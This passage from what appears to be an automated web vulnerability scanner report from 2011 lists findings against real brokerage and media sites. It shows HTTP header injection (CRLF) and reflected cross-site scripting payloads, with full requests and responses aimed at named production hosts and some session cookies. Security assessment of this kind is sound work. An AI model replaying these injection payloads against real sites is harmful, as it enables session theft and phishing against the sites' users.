17.6. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html

17.7. http://jqueryui.com/themeroller/

17.8. http://www.algoadvantage.com/

17.9. http://www.efutures.com/account/submitapp.php

17.10. http://www.facebook.com/connect/prompt_feed.php

17.11. http://www.facebook.com/dialog/feed

17.12. http://www.farrdirect.com/

17.13. http://www.farrdirect.com/hbooks.htm

17.14. http://www.futurestrading.com/

17.15. http://www.futurestrading.com/log-in.html

17.16. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html

17.17. http://www.futurestrading.com/managed-futures.html

17.18. http://www.globalfutures.com/index.asp

17.19. http://www.globalfutures.com/resources/forex-newsitem.asp

17.20. http://www.globalfutures.com/resources/futures-newsitem.asp

17.21. http://www.globalfutures.com/resources/newsitem.asp

17.22. http://www.globalfutures.com/resources/newsletter.asp

17.23. http://www.interactivebrokers.com/en/accounts/advisors/advisorsMain.php

17.24. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

17.25. http://www.interactivebrokers.com/en/accounts/brokers/brokerMain.php

17.26. http://www.interactivebrokers.com/en/accounts/closingAccount.php

17.27. http://www.interactivebrokers.com/en/accounts/institutions/fundMain.php

17.28. http://www.interactivebrokers.com/en/accounts/institutions/institutionalMain.php

17.29. http://www.interactivebrokers.com/en/accounts/legalDocuments/brokerPerformanceReports.php

17.30. http://www.interactivebrokers.com/en/accounts/legalDocuments/custIdentificationNotice.php

17.31. http://www.interactivebrokers.com/en/accounts/legalDocuments/homepageDisclosures.php

17.32. http://www.interactivebrokers.com/en/accounts/legalDocuments/privacy.php

17.33. http://www.interactivebrokers.com/en/general/about/about.php

17.34. http://www.interactivebrokers.com/en/general/about/awards.php

17.35. http://www.interactivebrokers.com/en/general/about/commentLetters.php

17.36. http://www.interactivebrokers.com/en/general/about/exchange_memberships.php

17.37. http://www.interactivebrokers.com/en/general/about/financials.php

17.38. http://www.interactivebrokers.com/en/general/about/ratingSandP.php

17.39. http://www.interactivebrokers.com/en/general/alpineHelp.php

17.40. http://www.interactivebrokers.com/en/general/bingoHelp.php

17.41. http://www.interactivebrokers.com/en/general/contact/feedbackForm.php

17.42. http://www.interactivebrokers.com/en/general/education/OptPriceAgreement.php

17.43. http://www.interactivebrokers.com/en/general/education/UserGuides.php

17.44. http://www.interactivebrokers.com/en/general/education/comparebrokers.php

17.45. http://www.interactivebrokers.com/en/general/education/hdi_Add_Products_Market_Data.php

17.46. http://www.interactivebrokers.com/en/general/education/hdi_Deposit_Withdraw_Transfer.php

17.47. http://www.interactivebrokers.com/en/general/education/hdi_bonds.php

17.48. http://www.interactivebrokers.com/en/general/education/hdi_borrow_lend.php

17.49. http://www.interactivebrokers.com/en/general/education/hdi_check_my_BAP.php

17.50. http://www.interactivebrokers.com/en/general/education/hdi_port_margin.php

17.51. http://www.interactivebrokers.com/en/general/education/hdi_trade_at_IB.php

17.52. http://www.interactivebrokers.com/en/general/education/highlights.php

17.53. http://www.interactivebrokers.com/en/general/education/pdfnotes/WN-TWSEarningsEvents.php

17.54. http://www.interactivebrokers.com/en/general/education/webinars.php

17.55. http://www.interactivebrokers.com/en/general/education/why_ib.php

17.56. http://www.interactivebrokers.com/en/general/notifications/ibchanges.php

17.57. http://www.interactivebrokers.com/en/general/platinumHelp.php

17.58. http://www.interactivebrokers.com/en/general/poll/ibconsultants.php

17.59. http://www.interactivebrokers.com/en/general/poll/poll.php

17.60. http://www.interactivebrokers.com/en/general/whyib/PDF-Education.php

17.61. http://www.interactivebrokers.com/en/general/whyib/PDF-GlobalOfferings.php

17.62. http://www.interactivebrokers.com/en/general/whyib/PDF-RiskManagement.php

17.63. http://www.interactivebrokers.com/en/general/whyib/PDF-SuperiorTradingTechnology.php

17.64. http://www.interactivebrokers.com/en/ibglobal_sites.php

17.65. http://www.interactivebrokers.com/en/p.php

17.66. http://www.interactivebrokers.com/en/pagemap/pagemap_APISolutions.php

17.67. http://www.interactivebrokers.com/en/pagemap/pagemap_about.php

17.68. http://www.interactivebrokers.com/en/pagemap/pagemap_accounts.php

17.69. http://www.interactivebrokers.com/en/pagemap/pagemap_demo.php

17.70. http://www.interactivebrokers.com/en/pagemap/pagemap_education.php

17.71. http://www.interactivebrokers.com/en/pagemap/pagemap_exchanges_around_world.php

17.72. http://www.interactivebrokers.com/en/pagemap/pagemap_fees.php

17.73. http://www.interactivebrokers.com/en/pagemap/pagemap_hdi.php

17.74. http://www.interactivebrokers.com/en/pagemap/pagemap_helpcontacts.php

17.75. http://www.interactivebrokers.com/en/pagemap/pagemap_login.php

17.76. http://www.interactivebrokers.com/en/pagemap/pagemap_mobiletrading.php

17.77. http://www.interactivebrokers.com/en/pagemap/pagemap_newaccounts.php

17.78. http://www.interactivebrokers.com/en/pagemap/pagemap_statements.php

17.79. http://www.interactivebrokers.com/en/pagemap/pagemap_trading.php

17.80. http://www.interactivebrokers.com/en/pagemap/pagemap_trading_platforms.php

17.81. http://www.interactivebrokers.com/en/pagemap/pagemap_webinars.php

17.82. http://www.interactivebrokers.com/en/pagemap/pagemap_whyib.php

17.83. http://www.interactivebrokers.com/en/site_map.php

17.84. http://www.interactivebrokers.com/en/software/downloadPlugin.php

17.85. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-FxTrader.php

17.86. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-StatementsandReports.php

17.87. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-TechAnalytics.php

17.88. http://www.interactivebrokers.com/en/software/systemStatus.php

17.89. http://www.interactivebrokers.com/en/software/twsDisclaimer.php

17.90. http://www.interactivebrokers.com/en/software/twsPrevious.php

17.91. http://www.interactivebrokers.com/en/software/twsTutorial.php

17.92. http://www.interactivebrokers.com/en/trading/holidayAndExpirationCalendar.php

17.93. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-Forex.php

17.94. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-OptionsDesk.php

17.95. http://www.interactivebrokers.com/en/trading/productsupdates.php

17.96. http://www.interactivebrokers.com/futures/images/sitetemplate/printHeader.gif

17.97. http://www.interactivebrokers.com/html/help/contact.html

17.98. https://www.interactivebrokers.com/cstools/ib_app_help/

17.99. https://www.interactivebrokers.com/jsp/Registration_v3/showScreenPreReg.jsp

17.100. http://www.optioneducation.net/select/direct_login.asp

17.101. http://www.pfgbest.com/link/

17.102. http://www.pfgbest.com/toolkit/

17.103. http://www.transworldfutures.com/Commodity.html

17.104. http://www.transworldfutures.com/quotes.html

17.105. http://www.youtube.com/results

18. File upload functionality

19. TRACE method is enabled

19.1. https://cwt1.interactivebrokers.com/

19.2. http://picasaweb.google.com/

19.3. http://pixel.everesttech.net/

19.4. http://shared.websol.barchart.com/

19.5. http://tracking.hubspot.com/

19.6. http://transworld.websol.barchart.com/

19.7. http://webstation.barchart.com/

19.8. http://www.adventuresinsoftware.com/

19.9. https://www.barchart.com/

19.10. http://www.efutures.com/

19.11. https://www.efutures.com/

19.12. http://www.farrdirect.com/

19.13. http://www.interactivebrokers.co.uk/

19.14. http://www.pfgbest.com/

19.15. http://www.zumo.com/

19.16. http://www2.daytrade4less.com/

20. Email addresses disclosed

20.1. http://360.sorensonmedia.com/api/getPlayerData

20.2. http://360.sorensonmedia.com/redirector/fetchFile

20.3. https://account.optionsxpress.com/OpenAccount/Index

20.4. https://account.optionsxpress.com/inc/general.js

20.5. https://account.optionsxpress.com/inc/s_code.js

20.6. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

20.7. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

20.8. http://ibkb.interactivebrokers.com/node/1071

20.9. http://ibkb.interactivebrokers.com/node/1132

20.10. http://images.google.com/support/bin/answer.py

20.11. http://maps.google.com/maps

20.12. http://translate.google.com/

20.13. http://www.efutures.com/account/submitapp.php

20.14. http://www.farrdirect.com/

20.15. http://www.google.com/advanced_search

20.16. http://www.google.com/finance

20.17. http://www.google.com/preferences

20.18. http://www.google.com/quality_form

20.19. http://www.google.com/reader/view/

20.20. http://www.google.com/support/websearch/bin/answer.py

20.21. http://www.google.com/webhp

20.22. http://www.interactivebrokers.com/download/en/ASX_ETF_March_09.pdf

20.23. http://www.interactivebrokers.com/download/en/ASX_IB_Options_March_17.pdf

20.24. http://www.interactivebrokers.com/download/en/ASX_Index_Futures_FO_March.pdf

20.25. http://www.interactivebrokers.com/download/en/CME_Trading_Related_Markets_Equities_Gold.pdf

20.26. http://www.interactivebrokers.com/download/en/ISE_FX_Greeks_121207.pdf

20.27. http://www.interactivebrokers.com/download/en/ISE_FX_Options.pdf

20.28. http://www.interactivebrokers.com/download/en/PHLX_IB012908jc.pdf

20.29. http://www.interactivebrokers.com/download/en/SGX-Asian_Option_opportunity.pdf

20.30. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

20.31. http://www.interactivebrokers.com/en/general/education/webinars.php

20.32. http://www.interactivebrokers.com/en/p.php

20.33. http://www.interactivebrokers.com/en/p.php

20.34. http://www.interactivebrokers.com/en/p.php

20.35. http://www.interactivebrokers.com/en/p.php

20.36. http://www.interactivebrokers.com/en/p.php

20.37. http://www.interactivebrokers.com/en/software/systemStatus.php

20.38. https://www.interactivebrokers.com/Universal/Templates/javascript/sha1.js

20.39. https://www.interactivebrokers.com/Universal/Templates/jquery.bgiframe.js

20.40. https://www.interactivebrokers.com/sso/Login

20.41. https://www.interactivebrokers.com/sso/Templates/javascript/sha1.js

20.42. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

20.43. http://www.optionsxpress.com/inc/general.js

20.44. http://www.optionsxpress.com/inc/js/library.js

20.45. http://www.optionsxpress.com/inc/js/stats.js

20.46. https://www.optionsxpress.com/welcome.asp

20.47. http://www.pfgbest.com/common/js/script.aculo.us/dragdrop.js

20.48. http://www.pfgbest.com/common/js/script.aculo.us/prototype.js

20.49. http://www.pfgbest.com/link/

20.50. http://www.transworldfutures.com/

20.51. http://www.transworldfutures.com/Commodity.html

20.52. http://www.transworldfutures.com/about.html

20.53. http://www.transworldfutures.com/account-types.html

20.54. http://www.transworldfutures.com/accountstatement.html

20.55. http://www.transworldfutures.com/best_direct.html

20.56. http://www.transworldfutures.com/best_direct_MT4.html

20.57. http://www.transworldfutures.com/best_direct_web.html

20.58. http://www.transworldfutures.com/commission_rates.html

20.59. http://www.transworldfutures.com/commodity-education.html

20.60. http://www.transworldfutures.com/contactus.html

20.61. http://www.transworldfutures.com/course_introduction.html

20.62. http://www.transworldfutures.com/css/css.css

20.63. http://www.transworldfutures.com/css/cssMenu.css

20.64. http://www.transworldfutures.com/currenex.html

20.65. http://www.transworldfutures.com/customer_support.html

20.66. http://www.transworldfutures.com/disaster_recovery.html

20.67. http://www.transworldfutures.com/favicon.ico

20.68. http://www.transworldfutures.com/first_notice_last_trading_day.html

20.69. http://www.transworldfutures.com/free-papertrading.html

20.70. http://www.transworldfutures.com/fund_your_account.html

20.71. http://www.transworldfutures.com/glossary.html

20.72. http://www.transworldfutures.com/index.html

20.73. http://www.transworldfutures.com/intro_to_futures.html

20.74. http://www.transworldfutures.com/open-an-account.html

20.75. http://www.transworldfutures.com/privacy_notice.html

20.76. http://www.transworldfutures.com/pro_trader.html

20.77. http://www.transworldfutures.com/quotes.html

20.78. http://www.transworldfutures.com/simulated_trading.html

20.79. http://www.transworldfutures.com/strategy-exchange.html

20.80. http://www.transworldfutures.com/strategy-runner.html

20.81. http://www.transworldfutures.com/trading_exchanges.html

20.82. http://www.transworldfutures.com/trading_platforms.html

20.83. http://www.transworldfutures.com/vocabulary.html

20.84. http://www.transworldfutures.com/weather.html

20.85. http://www.transworldfutures.com/web.php

21. Private IP addresses disclosed

21.1. http://www.facebook.com/connect/prompt_feed.php

21.2. http://www.facebook.com/dialog/feed

21.3. http://www.facebook.com/sharer.php

21.4. http://www.google.com/sdch/StnTz5pY.dct

22. Credit card numbers disclosed

22.1. http://www.interactivebrokers.com/download/en/ASX_ETF_March_09.pdf

22.2. http://www.interactivebrokers.com/download/en/ASX_IB_Options_March_17.pdf

22.3. http://www.interactivebrokers.com/download/en/ASX_Index_Futures_FO_March.pdf

22.4. http://www.interactivebrokers.com/download/en/ISE_FX_Greeks_121207.pdf

22.5. http://www.interactivebrokers.com/download/en/OIC_Modified_Collar.pdf

22.6. http://www.interactivebrokers.com/download/en/PHLX_IB012908jc.pdf

22.7. http://www.interactivebrokers.com/download/en/SGX_Apex50_Part1.pdf

22.8. http://www.interactivebrokers.com/download/en/Technical_Analysis.pdf

22.9. http://www.transworldfutures.com/pdf/historicalcharts.pdf

23. Robots.txt file

23.1. https://account.optionsxpress.com/OpenAccount/Index

23.2. https://adwords.google.com/um/StartNewLogin

23.3. http://cdn-static.viddler.com/crossdomain.xml

23.4. http://cdn-thumbs.viddler.com/crossdomain.xml

23.5. http://cdn.static.viddler.com/flash/as3/full-publisher.swf

23.6. https://docs.google.com/

23.7. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

23.8. http://go.microsoft.com/fwlink/

23.9. http://groups.google.com/groups

23.10. http://images.google.com/support/bin/answer.py

23.11. http://jqueryui.com/themeroller/

23.12. http://l.addthiscdn.com/live/t00/200lo.gif

23.13. https://mail.google.com/mail/

23.14. http://maps.google.com/maps

23.15. http://news.google.com/news/story

23.16. https://online.optionsxpress.ca/new_account.asp

23.17. https://online.optionsxpress.com.sg/new_account.asp

23.18. https://online.optionsxpress.eu/new_account.asp

23.19. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

23.20. http://picasaweb.google.com/lh/view

23.21. http://pixel.everesttech.net/2164/cq

23.22. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.23. http://scholar.google.com/scholar

23.24. https://sites.google.com/

23.25. http://stats.optionsxpress.com/b/ss/oxpressprodus/1/H.20.3/s83347698624711

23.26. http://toolbarqueries.clients.google.com/tbproxy/af/query

23.27. http://translate.google.com/

23.28. http://translate.googleapis.com/translate_a/l

23.29. http://webcache.googleusercontent.com/search

23.30. http://www.adobe.com/shockwave/download/download.cgi

23.31. https://www.barchart.com/register/realtime/

23.32. http://www.facebook.com/sharer.php

23.33. http://www.farrdirect.com/

23.34. http://www.futurestrading.com/

23.35. http://www.globalfutures.com/index.asp

23.36. http://www.google-analytics.com/__utm.gif

23.37. http://www.google.com/search

23.38. https://www.google.com/calendar

23.39. http://www.googleadservices.com/pagead/aclk

23.40. http://www.invest-store.com/commoditybooks/

23.41. http://www.optioneducation.net/select/direct_login.asp

23.42. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

23.43. https://www.optionsxpress.com/new_account.asp

23.44. https://www.optionsxpress.com.au/new_account.asp

23.45. https://www.pfgboss.com/Default.aspx

23.46. http://www.thefinancials.com/syndicated/DTS/DTSs_Commodities.js

23.47. http://www.usda.gov/wps/portal/!ut/p/_s.7_0_A/7_0_1OB

23.48. http://www.viddler.com/player/cc4ac375/

23.49. http://www.youtube.com/results

23.50. http://www.zumo.com/

24. Cacheable HTTPS response

24.1. https://account.optionsxpress.com/OpenAccount/Index

24.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

24.3. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

24.4. https://seal.verisign.com/getseal

24.5. https://www.barchart.com/register/realtime/

24.6. https://www.cqgtrader.com/Languages/USEng/oldBrowser.asp

24.7. https://www.efutures.com/cgi-bin/open_account.pl

24.8. https://www.efutures.com/favicon.ico

24.9. https://www.interactivebrokers.com/Universal/servlet/com.ib.xyztags.AuthHandler2

24.10. https://www.interactivebrokers.com/sso/Authenticator

24.11. https://www.optionsxpress.com/downloads/riskstoc.pdf

24.12. https://www.optionsxpress.com/welcome.asp

24.13. https://www.pfgboss.com/Default.aspx

24.14. https://www.secureclient5.ranweb.com/login/login.asp

24.15. https://www.secureclient5.ranweb.com/login/ranweb.asp

25. HTML does not specify charset

25.1. http://206.106.137.34/php/ticker/getFXMDdata.php

25.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

25.3. http://jqueryui.com/themeroller/

25.4. http://www.algoadvantage.com/

25.5. http://www.algoadvantage.com/Home.php

25.6. http://www.interactivebrokers.com/download/efp.html

25.7. http://www.interactivebrokers.com/en/general/education/webinars/cme-3-6-2006.html

25.8. http://www.interactivebrokers.com/futures/

25.9. http://www.interactivebrokers.com/mkt/ticker/getFXMDdata.php

25.10. http://www.interactivebrokers.com/wml/

25.11. http://www.invest-store.com/commoditybooks/

25.12. http://www.mobiletws.com/mobile/default.php

25.13. http://www.mobiletws.com/mobile/mobiles.php

25.14. https://www.secureclient5.ranweb.com/login/login.asp

25.15. https://www.secureclient5.ranweb.com/login/ranweb.asp

26. Content type incorrectly stated

26.1. http://206.106.137.34/php/ticker/getFXMDdata.php

26.2. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

26.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

26.4. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

26.5. http://pfgbest.app5.hubspot.com/salog.js.aspx

26.6. https://seal.verisign.com/getseal

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

26.8. http://shared.websol.barchart.com/lookup/qquote.php

26.9. http://shared.websol.barchart.com/quotes/default.php

26.10. http://shared.websol.barchart.com/text/disclaimer.php

26.11. http://transworld.websol.barchart.com/main.php

26.12. http://www.algoadvantage.com/favicon.ico

26.13. http://www.algoadvantage.com/fonts/helveticaneue-roman-webfont.woff

26.14. http://www.efutures.com/favicon.ico

26.15. https://www.efutures.com/favicon.ico

26.16. http://www.interactivebrokers.co.uk/contract_info/v3.7/js/FormFilter.js

26.17. http://www.interactivebrokers.co.uk/contract_info/v3.7/js/cicObj_en.js

26.18. http://www.interactivebrokers.com/images/sitetemplate/new/mnTempFlag_UK.gif

26.19. http://www.interactivebrokers.com/mkt/ticker/getFXMDdata.php

26.20. https://www.interactivebrokers.com/sso/Login

26.21. https://www.secureclient5.ranweb.com/login/ranweb.asp

26.22. http://www2.daytrade4less.com/livesupport/image.php

26.23. http://www2.daytrade4less.com/livesupport/scroll_image.php



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://pixel.everesttech.net/2164/cq [url parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 3b8a5%0d%0aff4bfa8fe85 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus233050073b8a5%0d%0aff4bfa8fe85 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR%00a6495"%20a%3db%203d6afe418bc; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus233050073b8a5
ff4bfa8fe85
&ef_id=zqROZUBXyFQAAIdR%00a6495"%20a%3db%203d6afe418bc:20110908192437:s
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

1.2. http://www.interactivebrokers.co.uk/contract_info/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.interactivebrokers.co.uk
Path:   /contract_info/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload cd855%0d%0a236a662b0c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /contract_info/index.php?cd855%0d%0a236a662b0c=1 HTTP/1.1
Host: www.interactivebrokers.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:47:35 GMT
Server: Apache
Accept-Ranges: bytes
Location: http://www.interactivebrokers.co.uk/contract_info/v3.7/index.php?cd855
236a662b0c
=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


2. Cross-site scripting (reflected)  previous  next
There are 31 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://360.sorensonmedia.com/api/getPlayerData [vguid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /api/getPlayerData

Issue detail

The value of the vguid request parameter is copied into the HTML document as plain text between tags. The payload 4cc9f<script>alert(1)</script>c8d9cd7cbe2 was submitted in the vguid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getPlayerData?vguid=7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>alert(1)</script>c8d9cd7cbe2 HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: text/javascript
Date: Thu, 08 Sep 2011 19:25:08 GMT
pragma: no-cache
Server: nginx/0.5.33
Content-Length: 695
Connection: keep-alive

{
"notAvailableImageURL": "http://360.sorensonmedia.com/images/flash_media_player_unviewable.png",
"errorStatus": "UNVIEWABLE",
"embedCode": "<a href=\"#\" onclick=\"return(false);\" rel=\"videoGUID=7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>alert(1)</script>c8d9cd7cbe2&\" style=\"display:block;width:640px;height:360px\" id=\"7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>
...[SNIP]...

2.2. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into a JavaScript rest-of-line comment. The payload b5a37%0aalert(1)//18aaa9ddc45 was submitted in the firm parameter. This input was echoed as b5a37
alert(1)//18aaa9ddc45
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(1)//18aaa9ddc45 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68123
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=66AF9B8F4E24595922509F9212AFCE78; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:27:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
<script type="text/javascript" language="javascript">
var cancelClicked = false;
var countryID = "1";

// var firmName = "OXb5a37
alert(1)//18aaa9ddc45
";

$(document).ready(SetIdleFocusFields);

function SetIdleFocusFields() {
$('input[type="text"]').addClass("idleField");
$('input[type="text"]').focus(fu
...[SNIP]...

2.3. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b37e"%3balert(1)//81efc02e54c was submitted in the firm parameter. This input was echoed as 5b37e";alert(1)//81efc02e54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX5b37e"%3balert(1)//81efc02e54c HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
